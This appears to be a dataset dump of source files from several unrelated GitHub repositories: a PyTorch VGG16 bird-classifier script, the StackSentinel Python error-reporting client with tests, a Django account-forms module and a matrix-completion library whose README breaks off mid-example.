"text": "import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nfrom PIL import Image\nimport matplotlib.pyplot as plt\n\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nprint(device)\n\n# Specify transforms using torchvision.transforms as transforms\ntransformations = transforms.Compose([\n transforms.Resize(224),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n])\n\n# Load in each dataset and apply transformations using\n# the torchvision datasets as datasets library\n\ntrain_set = datasets.ImageFolder(\"hawk_data/train/\", transform = transformations)\ntest_set = datasets.ImageFolder(\"hawk_data/test/\", transform = transformations)\ntrain_loader = torch.utils.data.DataLoader(train_set, batch_size=4, shuffle=True)\n#train_loader = torch.utils.data.DataLoader(train_set, batch_size=len(train_set))\ntest_loader = torch.utils.data.DataLoader(test_set, batch_size =4, shuffle=True)\n\nclass_names = train_set.classes\nprint(class_names)\n\n# functions to show an image\ndef imshow(img):\n img = img.cpu()\n #img = img / 2 + 0.5 # unnormalize ((image * std) + mean)\n img = ((img * .225) + .5) # unnormalize ((image * std) + mean)\n npimg = img.numpy()\n plt.imshow(np.transpose(npimg, (1, 2, 0)))\n plt.show()\n\n# get some random training images\nfor x in range(1):\n dataiter = iter(train_loader)\n images, labels = dataiter.next()\n images = images.to(device)\n labels = labels.to(device)\n\n # print labels\n print(labels)\n # show images\n imshow(torchvision.utils.make_grid(images))\n\ncriterion = nn.CrossEntropyLoss()\nlosses = []\nminibatch_size = 4\nm = len(train_set)\n\n#model_ft = models.resnet18(pretrained=True)\nmodel_ft = models.vgg16(pretrained=True)\n#num_ftrs = model_ft.fc.in_features\n# Here the size of each output sample is set to 2.\n# # Alternatively, it can be generalized to nn.Linear(num_ftrs, len(class_names)).\n#model_ft.fc = nn.Linear(num_ftrs, 10)\nmodel_ft.classifier[-1] = nn.Linear(in_features=4096, out_features=len(class_names))\nmodel_ft = model_ft.to(device)\n\n\n# Observe that all parameters are being optimized\noptimizer = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9)\n\ndef train_net():\n model_ft.train()\n for epoch in range(30): # loop over the dataset multiple times\n minibatch_cost = 0.\n num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set\n running_loss = 0.0\n for i, data in enumerate(train_loader, 0):\n # get the inputs; data is a list of [inputs, labels]\n inputs, labels = data\n inputs = inputs.to(device)\n labels = labels.to(device)\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward + backward + optimize\n outputs = model_ft(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n loss.backward()\n minibatch_cost += loss.item() / num_minibatches\n optimizer.step()\n\n if epoch % 5 == 0:\n print (\"Cost after epoch %i: %f\" % (epoch, minibatch_cost))\n if epoch % 1 == 0:\n losses.append(minibatch_cost)\n print('Finished Training')\n # plot the cost\n plt.plot(np.squeeze(losses))\n plt.ylabel('loss')\n plt.xlabel('iterations (per tens)')\n plt.title(\"placeholder\")\n #plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\ndef 
predict(data_loader):\n correct = 0\n total = 0\n for i, data in enumerate(data_loader, 0):\n images, labels = data\n images = images.to(device)\n labels = labels.to(device)\n labels_np = labels.detach().cpu().numpy()\n outputs = model_ft(images)\n _, preds = torch.max(outputs, 1)\n for i, x in enumerate(preds):\n total += 1\n correct += (class_names[preds[i]] == class_names[labels_np[i]])\n percent_correct = 100 * correct / total\n print('Accuracy of the network on the %d images: %d %%' %(total, percent_correct))\n\ndef show_predictions(data_loader):\n dataiter = iter(data_loader)\n images, labels = dataiter.next()\n images = images.to(device)\n labels = labels.to(device)\n labels_np = labels.detach().cpu().numpy()\n imshow(torchvision.utils.make_grid(images))\n print('GroundTruth: ', ' '.join('%5s' % class_names[labels_np[j]] for j in range(minibatch_size)))\n outputs = model_ft(images)\n _, preds = torch.max(outputs, 1)\n print('Predicted: ', ' '.join('%5s' % class_names[preds[j]] for j in range(minibatch_size)))\n\ntrain_net()\npredict(train_loader)\npredict(test_loader)\nshow_predictions(test_loader)\n\ntorch.save(model_ft.state_dict(), 'vgg16_added_birds.pt')\n"
}
] | 6 |
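Editor's note: `pretrained_model.py` fine-tunes every VGG16 parameter (`optim.SGD(model_ft.parameters(), ...)`). A common lighter-weight variant, not used in this repo, is to freeze the convolutional features and train only the replaced classifier head. A minimal sketch under that assumption:

```python
import torch.nn as nn
import torch.optim as optim
import torchvision.models as models

model = models.vgg16(pretrained=True)
for param in model.features.parameters():
    param.requires_grad = False           # keep the ImageNet feature extractor fixed

model.classifier[-1] = nn.Linear(4096, 12)  # 12 classes, as in this repo's class_names

# Only hand the still-trainable parameters to the optimizer.
trainable = [p for p in model.parameters() if p.requires_grad]
optimizer = optim.SGD(trainable, lr=0.001, momentum=0.9)
```

This usually trains faster and overfits less on a small dataset, at the cost of some accuracy ceiling compared to full fine-tuning.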
StackSentinel/stacksentinel-python | https://github.com/StackSentinel/stacksentinel-python | a8fca5165273f6b5dfa9248e833e84f5b174388a | 253664ac5ccaeb312f4288580e10061dac65403c | 2585e7dcf09265918375ca8b98bd4859a8bc8693 | refs/heads/master | 2021-01-22T06:59:10.659274 | 2015-09-25T17:44:53 | 2015-09-25T17:44:53 | 42,614,011 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6996073126792908,
"alphanum_fraction": 0.713350772857666,
"avg_line_length": 27.27777862548828,
"blob_id": "14f29349685abdf00a0a2d8ad39fbf47f738c66a",
"content_id": "b47674e4fe7f56d4566929d81f2a7ebc39029f21",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1528,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 54,
"path": "/README.md",
"repo_name": "StackSentinel/stacksentinel-python",
"src_encoding": "UTF-8",
"text": "# StackSentinel Python Client\n\nWelcome to the Stack Sentinel Python client, which makes it super-duper easy to integrate\n[Stack Sentinel](https://www.stacksentinel.com/) exception tracking into your Python project.\n\nTo get started tracking errors,\n\n1. Create an account on StackSentinel.com\n2. Create a new project\n3. Get your PROJECT and API tokens\n4. Add StackSentinel to your WSGI Middleware, or use it directly.\n\n## Installation\nstacksentinel is in pypi:\n\n # easy_install stacksentinel\n \nor\n\n # pip install stacksentinel\n\n## Directly use the client\n\nHere's how to get started:\n\n >>> import StackSentinel\n >>> stack_sentinel_client = StackSentinel.StackSentinelClient(\n ... account_token='-- YOUR ACCOUNT TOKEN --',\n ... project_token='-- YOUR PROJECT TOKEN --',\n ... environment='development-experiment', tags=['documentation-test'])\n >>> print stack_sentinel_client\n <StackSentinel.StackSentinelClient object at 0x10bcfbb90>\n >>> try:\n ... oops = 1 / 0\n ... except:\n ... stack_sentinel_client.handle_exception()\n ...\n \nThen you can use the WSGI Middleware:\n \n >>> app = StackSentinelMiddleware(app, stack_sentinel_client)\n\n# Compatibility\nThis StackSentinel Python Client is compatible with Python 2.7 and 3.x and Stack Sentinel API v1.\n\n# License\nCopyright 2015 Stack Sentinel. All Rights Reserved.\n\nThis software is licensed under the Apache License, version 2.0.\n\nSee LICENSE for full details.\n\n# Getting Help\nEmail [email protected] with your questions. \n"
},
{
"alpha_fraction": 0.5947955250740051,
"alphanum_fraction": 0.5971189737319946,
"avg_line_length": 30.647058486938477,
"blob_id": "c0c07caaa5b4732f414084c28a797c887329dae8",
"content_id": "4cb2001c860dcb7840611b1638871313b6d805a9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2152,
"license_type": "permissive",
"max_line_length": 90,
"num_lines": 68,
"path": "/tests/test_client.py",
"repo_name": "StackSentinel/stacksentinel-python",
"src_encoding": "UTF-8",
"text": "\"\"\"\nTests for Stack Sentinel client.\n\"\"\"\nimport json\nfrom StackSentinel import StackSentinelMiddleware, StackSentinelClient, StackSentinelError\n\nimport unittest\nimport sys\n\nclass TestStackSentinel(unittest.TestCase):\n def setUp(self):\n pass\n\n def test_serialize_object(self):\n class RegularClass(object):\n pass\n\n class ObjectThatCantBeRepr(object):\n def __repr__(self):\n raise RuntimeError\n\n x = RegularClass()\n y = StackSentinelClient._serialize_object(x)\n if not (y.startswith('<') and 'RegularClass' in y):\n self.fail('Unexpected result from _serialize_object: %r' % y)\n\n x = ObjectThatCantBeRepr()\n y = StackSentinelClient._serialize_object(x)\n self.failUnlessEqual(y, '<Cannot Be Serialized>')\n\n def test_get_sys(self):\n client = StackSentinelClient('', '', 'unittest')\n sys_info = client._get_sys_info()\n self.failUnlessEqual(sys.path, sys_info['path'])\n\n def test_get_machine_info(self):\n client = StackSentinelClient('', '', 'unittest')\n machine_info = client._get_machine_info()\n self.failUnless('hostname' in machine_info)\n\n def test_generate_request(self):\n client = StackSentinelClient('', '', 'unittest')\n (request, payload) = client._generate_request(\n environment='unitest',\n error_message='TEST ERROR MESSAGE',\n error_type='TEST ERROR TYPE',\n return_feedback_urls=True,\n state={\n 'test': range(100)\n },\n tags=['cheese'],\n traceback=[]\n )\n payload_parsed = json.loads(payload)\n self.failUnless('return_feedback_urls' in payload)\n\n def test_handle_exception(self):\n client = StackSentinelClient('', '', 'unittest')\n try:\n x = 1 / 0\n except:\n send_error_args = client.handle_exception(dry_run=True)\n if not isinstance(send_error_args, dict):\n self.fail('Did not return dict from handle_exception with dry_run enabled.')\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.593727707862854,
"alphanum_fraction": 0.5968460440635681,
"avg_line_length": 34.97435760498047,
"blob_id": "08e3d505c088736e8edc11db427e14b3dd062211",
"content_id": "c5bd5aee2c5bd7228f366b71eccf1ffd417c89a9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11224,
"license_type": "permissive",
"max_line_length": 212,
"num_lines": 312,
"path": "/StackSentinel/__init__.py",
"repo_name": "StackSentinel/stacksentinel-python",
"src_encoding": "UTF-8",
"text": "\"\"\"\nStackSentinel Python Client\n===========================\nUse this client to integrate StackSentinel (www.stacksentinel.com) into your Python projects. You can also use\nplatform-specific StackSentinel clients, such as the stacksentinel-flask client:\n\n>>> import StackSentinel\n>>> stack_sentinel_client = StackSentinel.StackSentinelClient(\n... account_token='-- YOUR ACCOUNT TOKEN --',\n... project_token='-- YOUR PROJECT TOKEN --',\n... environment='development-experiment', tags=['documentation-test'])\n>>> print stack_sentinel_client\n<StackSentinel.StackSentinelClient object at 0x10bcfbb90>\n>>> try:\n... oops = 1 / 0\n... except:\n... stack_sentinel_client.handle_exception()\n...\n\nThat's all it takes. The information about the exception, along with platform and machine information, is gathered\nup and sent to Stack Sentinel.\n\nFor WSGI applications, you can use the WSGI Middleware included with this project:\n\n>>> app = StackSentinelMiddleware(app, stack_sentinel_client)\n\nCompatibility\n=============\nThis StackSentinel Python Client is compatible with Python 2.7 and 3.x and Stack Sentinel API v1.\n\nLicense\n=======\nCopyright 2015 Stack Sentinel. All Rights Reserved.\n\nThis software is licensed under the Apache License, version 2.0.\n\nSee LICENSE for full details.\n\nGetting Help\n============\nEmail [email protected] with your questions.\n\"\"\"\nimport json\nimport os\nimport sys\n\n#\n# Some sandboxed environments do not have socket\ntry:\n import socket\nexcept:\n socket = None\n\n#\n# Some sandboxed environments do not have platform\ntry:\n import platform\nexcept:\n platform = None\n\n#\n# Python2/3\ntry:\n from urllib2 import urlopen, Request, HTTPError\nexcept ImportError:\n from urllib.request import urlopen, Request, HTTPError\n\n\nclass StackSentinelError(ValueError):\n \"\"\"\n Exception raised when there is an error communicating with backend or generating request for backend.\n \"\"\"\n pass\n\n\nclass StackSentinelClient(object):\n \"\"\"\n Client to send exceptions to StackSentinel. See in particular the handle_exception method, which can be called\n within an except block. See also the send_error method, which at a lower level generates an appropriate payload\n for the StackSentinel API.\n \"\"\"\n USER_AGENT = 'STACK SENTINEL PYTHON CLIENT'\n\n def __init__(self, account_token, project_token, environment, tags=None,\n endpoint=\"https://api.stacksentinel.com/api/v1/insert\"):\n \"\"\"\n\n :param account_token: Your account token, as supplied by StackSentinel\n :param project_token: Your project token, as supplied by StackSentinel\n :param environment: The environment of the project (eg, \"production\", \"devel\", etc)\n :param tags: Any tags you want associated with *all* errors sent using this client.\n :param endpoint: API endpoint. 
Defaults to StackSentinel backend.\n \"\"\"\n self.account_token = account_token\n self.project_token = project_token\n self.endpoint = endpoint\n self.environment = environment\n if tags:\n self.tags = tags\n else:\n self.tags = []\n\n @staticmethod\n def _serialize_object(obj):\n \"\"\"\n When the state of an exception includes something that we can't pickle, show something useful instead.\n \"\"\"\n try:\n return repr(obj)\n except:\n return '<Cannot Be Serialized>'\n\n def handle_exception(self, exc_info=None, state=None, tags=None, return_feedback_urls=False,\n dry_run=False):\n \"\"\"\n Call this method from within a try/except clause to generate a call to Stack Sentinel.\n\n :param exc_info: Return value of sys.exc_info(). If you pass None, handle_exception will call sys.exc_info() itself\n :param state: Dictionary of state information associated with the error. This could be form data, cookie data, whatnot. NOTE: sys and machine are added to this dictionary if they are not already included.\n :param tags: Any string tags you want associated with the exception report.\n :param return_feedback_urls: If True, Stack Sentinel will return feedback URLs you can present to the user for extra debugging information.\n :param dry_run: If True, method will not actively send in error information to API. Instead, it will return a request object and payload. Used in unittests.\n\n \"\"\"\n if not exc_info:\n exc_info = sys.exc_info()\n if exc_info is None:\n raise StackSentinelError(\"handle_exception called outside of exception handler\")\n\n (etype, value, tb) = exc_info\n try:\n msg = value.args[0]\n except:\n msg = repr(value)\n\n if not isinstance(tags, list):\n tags = [tags]\n\n limit = None\n\n new_tb = []\n n = 0\n\n while tb is not None and (limit is None or n < limit):\n f = tb.tb_frame\n lineno = tb.tb_lineno\n co = f.f_code\n filename = co.co_filename\n name = co.co_name\n tb = tb.tb_next\n n = n + 1\n\n new_tb.append({'line': lineno, 'module': filename, 'method': name})\n\n if state is None:\n state = {}\n\n if 'sys' not in state:\n try:\n state['sys'] = self._get_sys_info()\n except Exception as e:\n state['sys'] = '<Unable to get sys: %r>' % e\n if 'machine' not in state:\n try:\n state['machine'] = self._get_machine_info()\n except Exception as e:\n state['machine'] = '<Unable to get machine: %e>' % e\n\n if tags is None:\n tags = []\n\n # The joy of Unicode\n if sys.version_info.major > 2:\n error_type = str(etype.__name__)\n error_message = str(value)\n else:\n error_type = unicode(etype.__name__)\n error_message = unicode(value)\n\n send_error_args = dict(error_type=error_type,\n error_message=error_message,\n traceback=new_tb,\n environment=self.environment,\n state=state,\n tags=self.tags + tags,\n return_feedback_urls=return_feedback_urls)\n if dry_run:\n return send_error_args\n else:\n return self.send_error(**send_error_args)\n\n def _get_sys_info(self):\n sys_info = {\n 'version': sys.version,\n 'version_info': sys.version_info,\n 'path': sys.path,\n 'platform': sys.platform\n }\n return sys_info\n\n def _get_machine_info(self):\n machine = {}\n if socket:\n try:\n machine['hostname'] = socket.gethostname()\n except Exception as e:\n machine['hostname'] = '<Could not determine: %r>' % (e,)\n else:\n machine['hostname'] = \"<socket module not available>\"\n machine['environ'] = dict(os.environ)\n if platform:\n machine['platform'] = platform.uname()\n machine['node'] = platform.node()\n machine['libc_ver'] = platform.libc_ver()\n machine['version'] = platform.version()\n 
machine['dist'] = platform.dist()\n return machine\n\n def send_error(self, error_type, error_message, traceback, environment, state, tags=None,\n return_feedback_urls=False):\n \"\"\"\n Sends error payload to Stack Sentinel API, returning a parsed JSON response. (Parsed as in,\n converted into Python dict/list objects)\n\n :param error_type: Type of error generated. (Eg, \"TypeError\")\n :param error_message: Message of error generated (Eg, \"cannot concatenate 'str' and 'int' objects\")\n :param traceback: List of dictionaries. Each dictionary should contain, \"line\", \"method\", and \"module\" keys.\n :param environment: Environment the error occurred in (eg, \"devel\")_\n :param state: State of the application when the error happened. Could contain form data, cookies, etc.\n :param tags: Arbitrary tags you want associated with the error. list.\n :param return_feedback_urls: If True, return payload will offer URLs to send users to collect additional feedback for debugging.\n :return: Parsed return value from Stack Sentinel API\n \"\"\"\n\n (request, payload) = self._generate_request(environment, error_message, error_type, return_feedback_urls,\n state, tags, traceback)\n try:\n response = urlopen(request)\n except HTTPError as e:\n if e.code == 400:\n raise StackSentinelError(e.read())\n else:\n raise\n\n if sys.version_info.major > 2:\n text_response = response.read().decode(response.headers.get_content_charset() or 'utf8')\n else:\n encoding = response.headers.get('content-type', '').split('charset=')[-1].strip()\n if encoding:\n text_response = response.read().decode('utf8', 'replace')\n else:\n text_response = response.read().decode(encoding)\n\n return json.loads(text_response)\n\n def _generate_request(self, environment, error_message, error_type, return_feedback_urls, state, tags, traceback):\n payload = json.dumps(dict(\n account_token=self.account_token,\n project_token=self.project_token,\n return_feedback_urls=return_feedback_urls,\n errors=[dict(\n error_type=error_type,\n error_message=error_message,\n environment=environment,\n traceback=traceback,\n state=state,\n tags=tags or []\n )]\n ), default=self._serialize_object)\n request = Request(self.endpoint, data=payload.encode('utf8'), headers={\n 'Accept-Charset': 'utf-8',\n \"Content-Type\": \"application/x-www-form-urlencoded ; charset=UTF-8\",\n 'User-Agent': self.USER_AGENT})\n return (request, payload)\n\n\nclass StackSentinelMiddleware(object):\n \"\"\"\n Stack Sentinel middleware client. As easy as this:\n\n >>> client = StackSentinelClient(...)\n >>> app = StackSentinelMiddleware(app, client)\n \"\"\"\n def __init__(self, app, client):\n \"\"\"\n :param app: WSGI application object\n :param client: Instance of StackSentinel\n \"\"\"\n self.app = app\n\n self.client = client\n\n def __call__(self, environ, start_response):\n result = None\n\n try:\n result = self.app(environ, start_response)\n except Exception:\n self.client.handle_exception(state={'wsgi_environ': environ})\n raise\n\n try:\n if result is not None:\n for i in result:\n yield i\n except Exception:\n self.client.handle_exception(state={'wsgi_environ': environ})\n raise\n\n finally:\n if hasattr(result, 'close'):\n result.close()\n"
},
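Editor's note: a self-contained way to see `StackSentinelMiddleware` in action is to wrap a trivial WSGI app with the reference `wsgiref` server. The tokens below are placeholders, and the handler is illustrative, not part of the package:

```python
from wsgiref.simple_server import make_server
from StackSentinel import StackSentinelClient, StackSentinelMiddleware

client = StackSentinelClient(account_token='<ACCOUNT TOKEN>',
                             project_token='<PROJECT TOKEN>',
                             environment='development')

def app(environ, start_response):
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [b'hello\n']

# Any exception raised inside app is reported to Stack Sentinel, then re-raised.
application = StackSentinelMiddleware(app, client)

if __name__ == '__main__':
    make_server('', 8000, application).serve_forever()
```

Note that the middleware's `__call__` is a generator, which WSGI servers iterate; the `finally` clause above guarantees the wrapped result is closed either way.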
{
"alpha_fraction": 0.581993579864502,
"alphanum_fraction": 0.5927116870880127,
"avg_line_length": 34.88461685180664,
"blob_id": "4ef81f25a3e6ab0651d160127b538ddd754180e1",
"content_id": "a9785ed480dced797751ced40f1db8e1a458eb2d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 933,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 26,
"path": "/setup.py",
"repo_name": "StackSentinel/stacksentinel-python",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\nversion = '1.2'\nurl = 'https://github.com/StackSentinel/stacksentinel-python'\n\nsetup(\n name='stacksentinel',\n description='Stack Sentinel client and WSGI middleware',\n keywords='stack sentinel stacksentinel exception tracking api',\n version=version,\n author=\"Jeri MgCuckin\",\n author_email=\"[email protected]\",\n url=url,\n test_suite='tests',\n packages=find_packages(exclude=['tests']),\n classifiers=[\"Programming Language :: Python\",\n \"Programming Language :: Python :: 2\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\"\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Intended Audience :: Developers',\n ],\n license='Apache License (2.0)'\n)\n"
}
] | 4 |
Zinfir/server | https://github.com/Zinfir/server | fb0a7a3d79ff98b7da916a5f5459596605baa3be | b5bcd3133aa574e8a682166c33098144ef97a646 | a1eeb33d1fd516ef60e3dc1a36661673b0a305ce | refs/heads/master | 2020-04-15T00:26:48.479839 | 2019-01-19T05:45:49 | 2019-01-19T05:50:11 | 164,240,355 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8064516186714172,
"alphanum_fraction": 0.8064516186714172,
"avg_line_length": 14.5,
"blob_id": "d232f6e05c99bd8b17fa61ddeef0845adac98e3c",
"content_id": "08a8666d123a052e28a164f4a0a0e2adb62c3180",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 31,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Zinfir/server",
"src_encoding": "UTF-8",
"text": "# server\nfurniture shop server\n"
},
{
"alpha_fraction": 0.5194085240364075,
"alphanum_fraction": 0.5268022418022156,
"avg_line_length": 25.19354820251465,
"blob_id": "68957ae1fac623f69d336622bf46e26991054dfe",
"content_id": "85bf6e97cc45f86db05c1795d11fb1f183b4d98e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1623,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 62,
"path": "/accounts/forms.py",
"repo_name": "Zinfir/server",
"src_encoding": "UTF-8",
"text": "from django import forms\nimport random, hashlib\nfrom accounts.models import Account\n\n\nclass Account_Form(forms.ModelForm):\n class Meta:\n model = Account\n fields = [\n 'username',\n 'password',\n 'first_name',\n 'last_name',\n 'email',\n 'phone',\n 'avatar'\n ]\n widgets = {\n 'password': forms.PasswordInput(attrs={'class': 'field_password'}),\n 'email': forms.EmailInput(attrs={'class': 'field_email'}),\n }\n\n\nclass Registration_Form(forms.Form):\n username = forms.CharField(\n label='Login', max_length=150,\n widget=forms.widgets.TextInput(\n attrs={'class': 'field_username'}\n )\n )\n email = forms.CharField(\n max_length=150, required=True,\n widget=forms.widgets.EmailInput(\n attrs={'class': 'field_email'}\n )\n )\n password = forms.CharField(\n max_length=250,\n widget=forms.widgets.PasswordInput(\n attrs={'class': 'field_password'}\n )\n )\n password_confirm = forms.CharField(\n max_length=250,\n widget=forms.widgets.PasswordInput(\n attrs={'class': 'field_password'}\n )\n )\n\n\nclass Registration_Model_Form(forms.ModelForm):\n class Meta:\n model = Account\n fields = [\n 'username',\n 'password',\n 'email',\n ]\n widgets = {\n 'password': forms.PasswordInput(attrs={'class': 'field_password'}),\n 'email': forms.EmailInput(attrs={'class': 'field_email'}),\n }"
}
] | 2 |
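Editor's note: `Registration_Form` in `accounts/forms.py` declares both `password` and `password_confirm` but, at least in this file, never compares them. A hedged sketch of the usual `clean()` hook that would enforce the match; the class name is illustrative, not from the repo:

```python
from django import forms

class RegistrationFormWithCheck(forms.Form):
    password = forms.CharField(max_length=250, widget=forms.PasswordInput)
    password_confirm = forms.CharField(max_length=250, widget=forms.PasswordInput)

    def clean(self):
        cleaned = super(RegistrationFormWithCheck, self).clean()
        if cleaned.get('password') != cleaned.get('password_confirm'):
            # Attach the error to the confirmation field so it renders next to it.
            self.add_error('password_confirm', 'Passwords do not match.')
        return cleaned
```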
rahulmadbhavi/matrix-completion-1 | https://github.com/rahulmadbhavi/matrix-completion-1 | 23e402eef43694088600bf73e7db81cbf22ad4b9 | bbaf0c1851077de47fff4570751d58bdb8a03f59 | 42a95534ceffb12b7540d0d10d5aaadbf66f51a9 | refs/heads/master | 2021-12-03T03:01:08.844055 | 2013-07-05T12:26:04 | 2013-07-05T12:26:04 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5593979954719543,
"alphanum_fraction": 0.5856547951698303,
"avg_line_length": 31.87368392944336,
"blob_id": "e79e44519936241c1c780041fa26ac003b0dcf6d",
"content_id": "19e70af2d01a02b13a5ff2e98609b7ed531d4212",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3123,
"license_type": "permissive",
"max_line_length": 261,
"num_lines": 95,
"path": "/matrixdecomposition.py",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 15 12:17:57 2012\n\n@author: Fela Winkelmolen\n\"\"\"\n\n\nimport scipy as sp\nimport scipy.linalg\nfrom matrixgeneration import *\n\n\"\"\"\nDecomposes an optionally incomplete matrix, into two components, one low rank, and one sparse. It takes the following arguments:\n Y: The matrix to decompose. It is supposed that Y is equal to TH + GA + W, where TH is an approximately low rank matrix, GA is a sparse \"spiky\" matrix, and W is noise. A full matrix needs to be given, but some parts can be ignored, as specified by the mask.\n Mask: A mask can be given to treat the matrix as incomplete. It must be of the same dimentions as Y. It must have 0 or False in the positions where Y is incomplete, 1 or True elsewhere. Defaults to None.\n lambda_d: regularization paramater for the low rank TH matrix.\n mu_d: regularization parameter for the sparse GA matrix. Use higher values if no spikes are expected.\n alpha: parameter that limits the maximum element of the low rank TH matrix. Bigger matrices will need a bigger alpha values.\n\nIt will return TH and GA.\n\"\"\"\ndef matrix_decomposition(Y, Mask=None, lambda_d=0.025, mu_d=0.005, alpha=20, max_iterations=1000):\n # default value\n if Mask == None: \n Mask = Y*0+1\n t = 1.0\n TH = GA = TH_last = GA_last = Y * 0.0 # theta and gamma\n for k in range(0, max_iterations):\n t_last = t\n #print (t_last - 1)/t\n t = ( 1.0 + sp.sqrt(1 + 4 * t**2) )/ 2.0\n #print (t_last - 1)/t\n Z = TH + (t_last - 1)/t*(TH-TH_last)\n N = GA + (t_last - 1)/t*(GA-GA_last)\n lambd = 0.5 # TODO: check\n f = ((Z+N) - Y) * 0.5\n first = Z - f*Mask\n second = N - f*Mask\n TH_last, GA_last = TH, GA\n TH, GA = prox_g([first, second], lambd, lambda_d, mu_d, alpha)\n if sp.sqrt(((TH - TH_last)**2).sum()) + sp.sqrt(((GA - GA_last)**2).sum()) < 1e-2:\n print k, \"iterations\"\n break\n return [TH, GA]\n\ndef prox_g(grad, lambd, lambda_d, mu_d, alpha):\n N, Z = grad\n \n X = N\n P = Q = N*0.0\n for i in range(0, 500): # TODO: how many iterations?\n Y = prox1(X+P, lambda_d, lambd)\n P = X + P - Y\n X_last = X\n X = prox2(Y+Q, alpha)\n Q = Y + Q - X\n if sp.sqrt(((X - X_last)**2).sum()) < 1e-4:\n break\n V = X\n \n # soft thresholding\n W = soft_threshold(Z, mu_d*lambd)\n return [V, W]\n\n# projection of nuclear norm\ndef prox1(X, lambda_d, lambd):\n U, s, Vh = sp.linalg.svd(X)\n d1, d2 = X.shape\n E = sp.linalg.diagsvd(s, d1, d2) # sigma \n S = soft_threshold(E, lambda_d*lambd)\n return U.dot(S.dot(Vh))\n\n# projection in Q\ndef prox2(X, alpha):\n limit = alpha / sp.sqrt(sp.array(X.shape).prod())\n X = sp.minimum(X, limit)\n X = sp.maximum(X, -limit)\n return X\n\ndef soft_threshold(X, s):\n return (X-s)*(X>s) + (X+s)*(X<-s)\n\n#sp.random.seed(0)\n#size = 30\n#TH = low_rank(size, 3)\n#GA = spiky(size)\n#Y = TH + GA\n#X = selection(size, 0.)\n#A, B = matrix_decomposition(Y*X, Mask=X)\n#print X[1, :]\n#print TH[1, :]\n#print A[1, :]\n#print GA[1, :]\n#print B[1, :]\n"
},
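Editor's note: the `soft_threshold(X, s)` helper above is the proximal operator of the l1 norm, equivalent to the elementwise rule sign(x) * max(|x| - s, 0). A quick standalone check of that equivalence (written with NumPy; the repo itself targets Python 2 and scipy):

```python
import numpy as np

def soft_threshold(X, s):
    # Same elementwise rule as in matrixdecomposition.py.
    return (X - s) * (X > s) + (X + s) * (X < -s)

X = np.random.randn(4, 4)
expected = np.sign(X) * np.maximum(np.abs(X) - 0.3, 0.0)
assert np.allclose(soft_threshold(X, 0.3), expected)
```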
{
"alpha_fraction": 0.7297096252441406,
"alphanum_fraction": 0.7386448383331299,
"avg_line_length": 73.55555725097656,
"blob_id": "cd685b499166c262c647dddfb7f1f18c9336d383",
"content_id": "d13c0aba0f6bef2b49147b5acad31dfc69d47fff",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1343,
"license_type": "permissive",
"max_line_length": 265,
"num_lines": 18,
"path": "/README.md",
"repo_name": "rahulmadbhavi/matrix-completion-1",
"src_encoding": "UTF-8",
"text": "Matrix Completion\n=================\n\nThis code implements a matrix completion and decomposition algorithm, based on [this][1] paper.\n\n[1]:http://arxiv.org/abs/1102.4807\n\nThe main method you will want to use is `matrix_decomposition()` which decomposes an optionally incomplete matrix, into two components, one low rank, and one sparse. It takes the following arguments:\n\n* `Y`: the matrix to decompose. `Y` is assumed to be equal to `TH + GA + W`, where `TH` is an approximately low rank matrix, `GA` is a sparse \"spiky\" matrix, and `W` is noise. A full matrix needs to be given, but some parts can be ignored, as specified by the mask.\n* `Mask`: a mask can be given to treat the matrix as incomplete. It must be of the same dimentions as `Y`. It must have `0` or `False` in the positions where `Y` is incomplete, `1` or `True` elsewhere. Defaults to `None`.\n* `lambda_d`: regularization paramater for the low rank `TH` matrix.\n* `mu_d`: regularization parameter for the sparse `GA` matrix. Use higher values if no spikes are expected.\n* `alpha`: parameter that limits the maximum element of the low rank TH matrix. Bigger matrices will need bigger alpha` values.\n\nThe method will **return** `TH` and `GA`.\n\nAdditionally the code contains some methods and classes to generate synthetic matrices and to test the decomposition in various ways.\n\n"
},
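Editor's note: putting the README's parameters together, a minimal end-to-end call on a synthetic matrix with roughly 20% missing entries, using the module and function names from this repo (which targets Python 2):

```python
import scipy as sp
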